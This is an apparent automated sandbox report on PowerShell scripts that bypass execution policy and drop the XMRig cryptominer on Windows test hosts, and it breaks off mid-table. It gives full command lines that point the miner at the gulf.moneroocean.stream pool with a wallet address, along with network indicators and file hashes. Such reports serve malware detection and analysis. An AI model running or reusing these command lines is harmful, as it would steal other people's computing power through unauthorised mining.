powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2136-0-0x00007FFD407B3000-0x00007FFD407B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ri1tfvxn.5md.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2136-6-0x000001F2B1B20000-0x000001F2B1B42000-memory.dmp
memory/2136-11-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-12-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-14-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-16-0x000001F2B1210000-0x000001F2B121A000-memory.dmp
memory/2136-15-0x000001F2B1AF0000-0x000001F2B1B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4908-47-0x0000018C66540000-0x0000018C66560000-memory.dmp
memory/4908-48-0x0000018C66580000-0x0000018C665A0000-memory.dmp
memory/4908-49-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-51-0x0000018C665A0000-0x0000018C665C0000-memory.dmp
memory/4908-52-0x0000018C665C0000-0x0000018C665E0000-memory.dmp
memory/2136-50-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-54-0x00007FFD407B3000-0x00007FFD407B5000-memory.dmp
memory/4908-53-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-55-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/2136-56-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/4908-57-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-58-0x0000018C665A0000-0x0000018C665C0000-memory.dmp
memory/4908-59-0x0000018C665C0000-0x0000018C665E0000-memory.dmp
memory/4908-60-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-61-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-62-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-63-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-64-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-65-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-66-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-67-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-68-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-69-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-70-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-71-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-72-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-73-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-74-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-75-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-76-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-77-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-78-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-79-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-80-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-81-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-82-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-83-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-84-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-85-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-86-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-87-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-88-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-89-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-90-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-91-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-92-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-93-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-94-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-95-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-96-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-97-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-98-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-99-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-100-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-101-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-102-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-103-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-104-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-105-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-106-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-107-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-108-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-109-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-110-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-111-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-112-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-113-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-114-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-115-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-116-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-117-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-118-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2224 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2224 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
memory/2224-0-0x00007FFC51413000-0x00007FFC51415000-memory.dmp
memory/2224-1-0x000002180B510000-0x000002180B532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iicdyhag.nu0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2224-11-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-12-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-14-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-15-0x0000021823B30000-0x0000021823B42000-memory.dmp
memory/2224-16-0x000002180B5B0000-0x000002180B5BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1092-47-0x00000128781D0000-0x00000128781F0000-memory.dmp
memory/1092-48-0x0000012879BE0000-0x0000012879C00000-memory.dmp
memory/2224-49-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/2224-51-0x00007FFC51413000-0x00007FFC51415000-memory.dmp
memory/1092-50-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/2224-52-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/1092-55-0x0000012879C20000-0x0000012879C40000-memory.dmp
memory/1092-54-0x0000012879C00000-0x0000012879C20000-memory.dmp
memory/1092-53-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-56-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/2224-57-0x00007FFC51410000-0x00007FFC51ED1000-memory.dmp
memory/1092-58-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-59-0x0000012879C00000-0x0000012879C20000-memory.dmp
memory/1092-60-0x0000012879C20000-0x0000012879C40000-memory.dmp
memory/1092-61-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-62-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-63-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-64-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-65-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-66-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-67-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-68-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-69-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-70-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-71-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-72-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-73-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-74-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-75-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-76-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-77-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-78-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-79-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-80-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-81-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-82-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-83-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-84-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-85-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-86-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-87-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-88-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-89-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-90-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-91-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-92-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-93-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-94-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-95-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-96-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-97-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-98-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-99-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-100-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-101-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-102-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-103-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-104-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-105-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-106-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-107-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-108-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-109-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-110-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-111-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-112-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-113-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-114-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-115-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-116-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-117-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-118-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
memory/1092-119-0x00007FF705790000-0x00007FF7063C3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 4808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 4808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1448-3-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp
memory/1448-5-0x000001BAE1950000-0x000001BAE1972000-memory.dmp
memory/1448-6-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp
memory/1448-9-0x000001BAE1C70000-0x000001BAE1CE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agfdoilp.zui.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
